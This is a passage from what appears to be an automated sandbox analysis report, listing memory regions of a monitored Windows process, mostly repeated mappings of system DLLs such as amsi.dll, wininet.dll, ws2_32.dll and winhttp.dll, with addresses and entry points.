end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 388 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 389 start_va = 0x6f870000 end_va = 0x6f875fff monitored = 0 entry_point = 0x6f8715d0 region_type = mapped_file name = "mssip32.dll" filename = "\\Windows\\SysWOW64\\mssip32.dll" (normalized: "c:\\windows\\syswow64\\mssip32.dll") Region: id = 390 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 391 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 392 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 393 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 394 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 395 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 396 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 397 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 398 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 399 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 400 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 401 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 402 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 403 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 404 start_va = 0x2330000 end_va = 0x234cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 405 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 406 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 407 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 408 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 409 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 410 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 411 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 412 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 413 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 414 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 415 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 416 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 417 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 418 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 419 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 420 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 421 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 422 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 423 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 424 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 425 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 426 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 427 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 428 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 429 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 430 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 431 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 432 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 433 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 434 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 435 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 436 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 437 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 438 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 439 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 440 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 441 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 442 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 443 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 444 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 445 start_va = 0x71590000 end_va = 0x7179cfff monitored = 0 entry_point = 0x7167acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 446 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 447 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 448 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 449 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 450 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 451 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 452 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 453 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 454 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 455 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 456 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 457 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 458 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 459 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 460 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 461 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 462 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 463 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 464 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 465 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 466 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 467 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 468 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 469 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 470 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 471 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 472 start_va = 0x71200000 end_va = 0x71212fff monitored = 0 entry_point = 0x71209950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 473 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 474 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 475 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 476 start_va = 0x3f70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f70000" filename = "" Region: id = 477 start_va = 0x2350000 end_va = 0x238ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 478 start_va = 0x4070000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 479 start_va = 0x26e0000 end_va = 0x26e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 480 start_va = 0x2760000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 481 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 482 start_va = 0x71540000 end_va = 0x71551fff monitored = 0 entry_point = 0x71544510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 483 start_va = 0x71510000 end_va = 0x7153efff monitored = 0 entry_point = 0x7151bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 484 start_va = 0x71470000 end_va = 0x7150afff monitored = 0 entry_point = 0x714af7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 485 start_va = 0x26f0000 end_va = 0x272ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 486 start_va = 0x4170000 end_va = 0x426ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 487 start_va = 0x4270000 end_va = 0x464ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 488 start_va = 0x4650000 end_va = 0x474ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 489 start_va = 0x4750000 end_va = 0x484ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 490 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 491 start_va = 0x70a50000 end_va = 0x70ad3fff monitored = 0 entry_point = 0x70a76530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 492 start_va = 0x71420000 end_va = 0x7146efff monitored = 0 entry_point = 0x7142d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 493 start_va = 0x2730000 end_va = 0x273ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002730000" filename = "" Region: id = 494 start_va = 0x71410000 end_va = 0x71417fff monitored = 0 entry_point = 0x71411fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 495 start_va = 0x4750000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 496 start_va = 0x4790000 end_va = 0x488ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 497 start_va = 0x4890000 end_va = 0x48cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 498 start_va = 0x48d0000 end_va = 0x49cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048d0000" filename = "" Region: id = 499 start_va = 0x717a0000 end_va = 0x7191dfff monitored = 0 entry_point = 0x7181c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 500 start_va = 0x2740000 end_va = 0x2740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002740000" filename = "" Region: id = 501 start_va = 0x6f730000 end_va = 0x6f776fff monitored = 0 entry_point = 0x6f7458d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 502 start_va = 0x6f780000 end_va = 0x6f787fff monitored = 0 entry_point = 0x6f781920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 503 start_va = 0x2750000 end_va = 0x2752fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 504 start_va = 0x49d0000 end_va = 0x49d7fff monitored = 0 entry_point = 0x49d19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 505 start_va = 0x49e0000 end_va = 0x49e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 506 start_va = 0x49d0000 end_va = 0x49d7fff monitored = 0 entry_point = 0x49d19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 507 start_va = 0x49e0000 end_va = 0x49e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 508 start_va = 0x49d0000 end_va = 0x49d7fff monitored = 0 entry_point = 0x49d19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 509 start_va = 0x49e0000 end_va = 0x49e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 510 start_va = 0x49d0000 end_va = 0x49d7fff monitored = 0 entry_point = 0x49d19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" 